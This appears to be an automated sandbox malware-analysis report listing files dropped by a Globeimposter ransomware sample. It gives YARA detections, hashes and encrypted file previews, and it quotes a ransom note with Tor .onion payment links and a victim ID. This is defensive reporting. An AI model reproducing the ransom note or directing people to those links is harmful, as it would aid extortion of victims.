                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_Globeimposter, Description: Yara detected Globeimposter Ransomware, Source: C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txt, Author: Joe Security
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1248
                                                                                                                                                      Entropy (8bit):5.9671483753574135
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Ge48CDebiQ3sA5ZdzK8sevWAVgKTaCB7RZ0cHYIgtyUzuqc:Ge48JuQ3skdzCwgck38jqc
                                                                                                                                                      MD5:0E60BA8FDE906921C780B5339DDC6E29
                                                                                                                                                      SHA1:520FDB37A74715AED318EBD83FC3EE23A7652B21
                                                                                                                                                      SHA-256:EADB08D31106A4AFD8319ED93B9798EBF010B96D162FCD0A4350F436AB984289
                                                                                                                                                      SHA-512:82C6E335FA5ACBB6B037D87463E69D4F2A16E69A2E9516E41DCBB452A37EA1E2631135ADB8185D9B3F9AA9E40955BF71A2B08FE42F54F93B60E1D7D6B80997C7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...m?.&...].B.....P.}....ih&)R..W.)..q&K.:....)zb..}.Y1..Y...0....Pf\Tb.e0.4.~..U9.<.Lj..xS........n[.Q;..}..:c.^9.._.)..b..P...2#"n..#.-.G..y.I'..lT.-..........AJx:......d....rU.p.?.%a.}.zg)............~V./...2W9.d.}ZV.y...k......~....J..&...Bg.....9R1$..#.73.......t=nD..\..8.....x...QkS7.bS.F..PR...A..j....WC...Di..+.IP4.wlP.<..pp..`...^?...Y.{%...0.*..-VBJ...B.!.....[).6Ea...Gt?oy@cY3....*T....{.,.Em.m.t#..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1248
                                                                                                                                                      Entropy (8bit):5.994596002507212
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:QEl+GSSft5mGzsts4J20dkvFzK8sevWAVgKTaCB7RZ0cHYIgtyUzN0:l+GSSTm+sjCvFzCwgck3880
                                                                                                                                                      MD5:0F5AEB4AACE7A8E6CC0EAF85DD597A0E
                                                                                                                                                      SHA1:5D3F16AD65F7296E4F2900EA30296752F7D79F44
                                                                                                                                                      SHA-256:942B79772E1E577A619BACA47A86F6FC5B0CAB78A73948CDA7AC2EDA973FE541
                                                                                                                                                      SHA-512:740FED9812FD8FDEC8161784FA93290AAC3051CD6C5482D1970FC4D3C85D78ADA0A1C51894D67EC456F734237828E565DC83F8ACC97EAC77468A3F9AAC9B8FF0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..8..O^.%....#.p..G....8.a$O.....a.2.@:..'q[\h].2].......W.".!,\2Q..X.).5.X.V....=..-..]..g.G. ...g..7)..T..L.B._........T.`.@..i.~....u....a@.,8.P.E...]%....He..F.Q.j..2.dE$..qJD..\.s.F.,..(...~...m)....H.{.P.Rr<P...02......P..@....~.....;o....e.....H.y...o.d.$\O........E!..a:..=....MH(....R.lX......V..S......[.......M.Z.R.....t0.L.r9...).....g.C......_h.[F6...2zs`Z.4.a.fC.n%....N.:....,6hrb.c%.'P..mT[].67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1248
                                                                                                                                                      Entropy (8bit):5.994596002507212
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:QEl+GSSft5mGzsts4J20dkvFzK8sevWAVgKTaCB7RZ0cHYIgtyUzN0:l+GSSTm+sjCvFzCwgck3880
                                                                                                                                                      MD5:0F5AEB4AACE7A8E6CC0EAF85DD597A0E
                                                                                                                                                      SHA1:5D3F16AD65F7296E4F2900EA30296752F7D79F44
                                                                                                                                                      SHA-256:942B79772E1E577A619BACA47A86F6FC5B0CAB78A73948CDA7AC2EDA973FE541
                                                                                                                                                      SHA-512:740FED9812FD8FDEC8161784FA93290AAC3051CD6C5482D1970FC4D3C85D78ADA0A1C51894D67EC456F734237828E565DC83F8ACC97EAC77468A3F9AAC9B8FF0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..8..O^.%....#.p..G....8.a$O.....a.2.@:..'q[\h].2].......W.".!,\2Q..X.).5.X.V....=..-..]..g.G. ...g..7)..T..L.B._........T.`.@..i.~....u....a@.,8.P.E...]%....He..F.Q.j..2.dE$..qJD..\.s.F.,..(...~...m)....H.{.P.Rr<P...02......P..@....~.....;o....e.....H.y...o.d.$\O........E!..a:..=....MH(....R.lX......V..S......[.......M.Z.R.....t0.L.r9...).....g.C......_h.[F6...2zs`Z.4.a.fC.n%....N.:....,6hrb.c%.'P..mT[].67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1248
                                                                                                                                                      Entropy (8bit):5.9671483753574135
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Ge48CDebiQ3sA5ZdzK8sevWAVgKTaCB7RZ0cHYIgtyUzuqc:Ge48JuQ3skdzCwgck38jqc
                                                                                                                                                      MD5:0E60BA8FDE906921C780B5339DDC6E29
                                                                                                                                                      SHA1:520FDB37A74715AED318EBD83FC3EE23A7652B21
                                                                                                                                                      SHA-256:EADB08D31106A4AFD8319ED93B9798EBF010B96D162FCD0A4350F436AB984289
                                                                                                                                                      SHA-512:82C6E335FA5ACBB6B037D87463E69D4F2A16E69A2E9516E41DCBB452A37EA1E2631135ADB8185D9B3F9AA9E40955BF71A2B08FE42F54F93B60E1D7D6B80997C7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...m?.&...].B.....P.}....ih&)R..W.)..q&K.:....)zb..}.Y1..Y...0....Pf\Tb.e0.4.~..U9.<.Lj..xS........n[.Q;..}..:c.^9.._.)..b..P...2#"n..#.-.G..y.I'..lT.-..........AJx:......d....rU.p.?.%a.}.zg)............~V./...2W9.d.}ZV.y...k......~....J..&...Bg.....9R1$..#.73.......t=nD..\..8.....x...QkS7.bS.F..PR...A..j....WC...Di..+.IP4.wlP.<..pp..`...^?...Y.{%...0.*..-VBJ...B.!.....[).6Ea...Gt?oy@cY3....*T....{.,.Em.m.t#..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):992
                                                                                                                                                      Entropy (8bit):5.109762797869363
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:81hHc4+SLzK8sevWAVgKTaCB7RZ0cHYIgtyUzNt:0hHp+kzCwgck38C
                                                                                                                                                      MD5:D718980B93C89CE8B8A345E0393A43BF
                                                                                                                                                      SHA1:C98DB1896D10516DAC03F4BC4D34A15C6335361F
                                                                                                                                                      SHA-256:455C2FE8C11D5AF03CB533A8188C57A5FA28BA576960B96EDFFBF4172D0D7D2F
                                                                                                                                                      SHA-512:445F27D636660AAF7C039FA3E20ED2ACE9C11E678707989F425415C11207BE563B143492DCBA3A10B2D624D7E13DD172E9809C9220255A2B48D782F3C6A65D9B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: a0....".K...oM....#.>].7U#.h.u.X#(....g......%..[...(.j.D.]..i+......*.,..n...&%..^|.0....q......N.......S.0RY.c..o$..B@...*LE(b.U..".B.....5....1..C..(l..&...S9.j867 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.>fn.........1..O.0~.....R..@........Q..i.o..'.
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):992
                                                                                                                                                      Entropy (8bit):5.109762797869363
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:81hHc4+SLzK8sevWAVgKTaCB7RZ0cHYIgtyUzNt:0hHp+kzCwgck38C
                                                                                                                                                      MD5:D718980B93C89CE8B8A345E0393A43BF
                                                                                                                                                      SHA1:C98DB1896D10516DAC03F4BC4D34A15C6335361F
                                                                                                                                                      SHA-256:455C2FE8C11D5AF03CB533A8188C57A5FA28BA576960B96EDFFBF4172D0D7D2F
                                                                                                                                                      SHA-512:445F27D636660AAF7C039FA3E20ED2ACE9C11E678707989F425415C11207BE563B143492DCBA3A10B2D624D7E13DD172E9809C9220255A2B48D782F3C6A65D9B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: a0....".K...oM....#.>].7U#.h.u.X#(....g......%..[...(.j.D.]..i+......*.,..n...&%..^|.0....q......N.......S.0RY.c..o$..B@...*LE(b.U..".B.....5....1..C..(l..&...S9.j867 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.>fn.........1..O.0~.....R..@........Q..i.o..'.
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132016
                                                                                                                                                      Entropy (8bit):5.008640363962703
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:9OttYWtknFblP3mrSk3xWKZ0oqcE6xmV3cp0q574U47Qn:961WFZernNZ/xm1FsMY
                                                                                                                                                      MD5:BE18AF5EC15B94564F837F7B4D157DE9
                                                                                                                                                      SHA1:D7182EBE6D23080B1E32538313E1A9C3B5F62FDD
                                                                                                                                                      SHA-256:9A5356C45FB5A588C13CA41F42D6716C9712CAEC4E4E6459CC2D69B3DBAE0343
                                                                                                                                                      SHA-512:B7972A3EC8AACDE6E1DD43B4BCEB5D2BAB8DFC4632EC0CF6A80AC6C2A45A9D4C64898AA54B288D748B4C9C231B90F5FD853D2E82AE072E7F1335E4649248AA57
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .n;..>...I."...5.&4E[D.M.`.....H.,`...b...d...Z...LgnlK.%..L......P..!.6.F]. |.E..d...=.......c[....;.p.5/...4.,..`.....83y.`...O.gg.N.=....x.>|..~.+k...0... ...A.}3.9"...k.]Hh......9.W.2O7...K.;`..........iW6.....d.Q9C'....3AN...x...C...F#(...Z.gj.~V...9..f8...-FfS?=.,....T...d.....P0.*..O.....g7?..o.c.q.&$!]..k.........B...}'..{...U]......Ej1(.H.^oE...4.a.a......I`.HvL0N.H.2.^.7F..6L..z#...z3IMmeQ5.{#%q..W.....*...uhQX..N#<n.....c......8..cO).o<.I.&.....Y...Fw5(f#..:X..s.B.*3.....*'G.._@...!...]..}...E|N.SQQa..1%.1g.....@:|.GK>(K.D..E...2..Z.u.(#...I...........8..Q.J..d..iCx.......4XC.?..z.r=.Lw..r...{.j.h.E.....y.P......).... ).v......"..f.i...2......z...X..GY|..t.....Dn.D?..S.G3...g.H..1K.T...j..6\.."R.......D....4R=...0..`.e..@............1.oT4.k...Q......L1..k................=.....0d.j.U...)x..N......Ym.u...#.O.A{.U.8M.&..s......`.....a).l...]..T...5..`7...}.J q..+.Wq...w..^O}..........81iJ=.F..^.F..(..G.`.y`...`..7..-Y.P_...
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132016
                                                                                                                                                      Entropy (8bit):5.008640363962703
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:9OttYWtknFblP3mrSk3xWKZ0oqcE6xmV3cp0q574U47Qn:961WFZernNZ/xm1FsMY
                                                                                                                                                      MD5:BE18AF5EC15B94564F837F7B4D157DE9
                                                                                                                                                      SHA1:D7182EBE6D23080B1E32538313E1A9C3B5F62FDD
                                                                                                                                                      SHA-256:9A5356C45FB5A588C13CA41F42D6716C9712CAEC4E4E6459CC2D69B3DBAE0343
                                                                                                                                                      SHA-512:B7972A3EC8AACDE6E1DD43B4BCEB5D2BAB8DFC4632EC0CF6A80AC6C2A45A9D4C64898AA54B288D748B4C9C231B90F5FD853D2E82AE072E7F1335E4649248AA57
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .n;..>...I."...5.&4E[D.M.`.....H.,`...b...d...Z...LgnlK.%..L......P..!.6.F]. |.E..d...=.......c[....;.p.5/...4.,..`.....83y.`...O.gg.N.=....x.>|..~.+k...0... ...A.}3.9"...k.]Hh......9.W.2O7...K.;`..........iW6.....d.Q9C'....3AN...x...C...F#(...Z.gj.~V...9..f8...-FfS?=.,....T...d.....P0.*..O.....g7?..o.c.q.&$!]..k.........B...}'..{...U]......Ej1(.H.^oE...4.a.a......I`.HvL0N.H.2.^.7F..6L..z#...z3IMmeQ5.{#%q..W.....*...uhQX..N#<n.....c......8..cO).o<.I.&.....Y...Fw5(f#..:X..s.B.*3.....*'G.._@...!...]..}...E|N.SQQa..1%.1g.....@:|.GK>(K.D..E...2..Z.u.(#...I...........8..Q.J..d..iCx.......4XC.?..z.r=.Lw..r...{.j.h.E.....y.P......).... ).v......"..f.i...2......z...X..GY|..t.....Dn.D?..S.G3...g.H..1K.T...j..6\.."R.......D....4R=...0..`.e..@............1.oT4.k...Q......L1..k................=.....0d.j.U...)x..N......Ym.u...#.O.A{.U.8M.&..s......`.....a).l...]..T...5..`7...}.J q..+.Wq...w..^O}..........81iJ=.F..^.F..(..G.`.y`...`..7..-Y.P_...
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\Cookies
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:COM executable for DOS
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):21424
                                                                                                                                                      Entropy (8bit):5.86692722400371
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:Lr7SNgx7nLlH+W21rsVr5GGsl/JAMx3gFF6qmZla2:HOeLH+/1kbUGqg6r/n
                                                                                                                                                      MD5:D7882A99AA64CDBFDC132D212FAE7572
                                                                                                                                                      SHA1:D8DAA155ECC8E9ED3485BBC5D6D7A2CAC62E27A8
                                                                                                                                                      SHA-256:E4254E24DEB8B81662E8AC0F989144F307B4EBA3F93FB0EC98DEF892DFF1A339
                                                                                                                                                      SHA-512:31CF553BD9121A1FD7B0755662418E60FECE57BF12DE788227E99AC98AF16E433F011BF164EB7BBF9504391FFFDBB5C92CFF43610E0752090B3253F29A005D77
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .x..D.og........Fx..i&bs\;.......a..k.(..,....5..g...n..=..P.....K;zr'...D..[...N.M%..TW'..WOj!..U.......].......l+..YC%R.;....s....!.g#A!....+....u..^...^..#......o....9u.p>...h..........._..4..5.......]...........V)`3|..<.M....i....`^..b.#.9-....'E/D..Nm..Z_.[<..I..4<...X1.....%w..T..P.g..ablL....W.s....u.gm.s5...]d..w..^..9.o.p..l;.@l9S..'.~P.8..S..8..=*}z.g.B.72.g/@.P=.h...Q...]...}.yw..#.t.....F.....?...Q.'>8$~R...S....i".n..-\....B8+.5...A.....t..}. 9..Df..u.....Q#9.l.D..({.u^.':..$.. .)..(.m%..Xp`.P.......s .jeA.Et........+.....b...\&Ke.H....C..A>... .....vB1pc.ee.........'n1!.oS.6..TZ...f.9..<..KfWGf.....,.......KY.y.).yH._.Y. .....T30.VH..+.........\K..RoV?...=......v.yb...'.D.{D.g....1./._.4.j..>.i.)7.-...@..V..+MhM......1..!..*.M..Zy/.ZV..p.b.%.:.R(.=... ~b...c]......st...]j..........5yk.?.5..vn....T...gQ....Q.....#o{|.f[WCU.. b.$Uq.4..U.......L.f.CC>...A..og..I..,u].j...XZ.6..yg.I.....xQ...z.C......X-m.C+.u......q..
                                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cookie\Cookies.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:COM executable for DOS
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):21424
                                                                                                                                                      Entropy (8bit):5.86692722400371
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:Lr7SNgx7nLlH+W21rsVr5GGsl/JAMx3gFF6qmZla2:HOeLH+/1kbUGqg6r/n
                                                                                                                                                      MD5:D7882A99AA64CDBFDC132D212FAE7572
                                                                                                                                                      SHA1:D8DAA155ECC8E9ED3485BBC5D6D7A2CAC62E27A8
                                                                                                                                                      SHA-256:E4254E24DEB8B81662E8AC0F989144F307B4EBA3F93FB0EC98DEF892DFF1A339
                                                                                                                                                      SHA-512:31CF553BD9121A1FD7B0755662418E60FECE57BF12DE788227E99AC98AF16E433F011BF164EB7BBF9504391FFFDBB5C92CFF43610E0752090B3253F29A005D77
                                                                                                                                                      Malicious:false
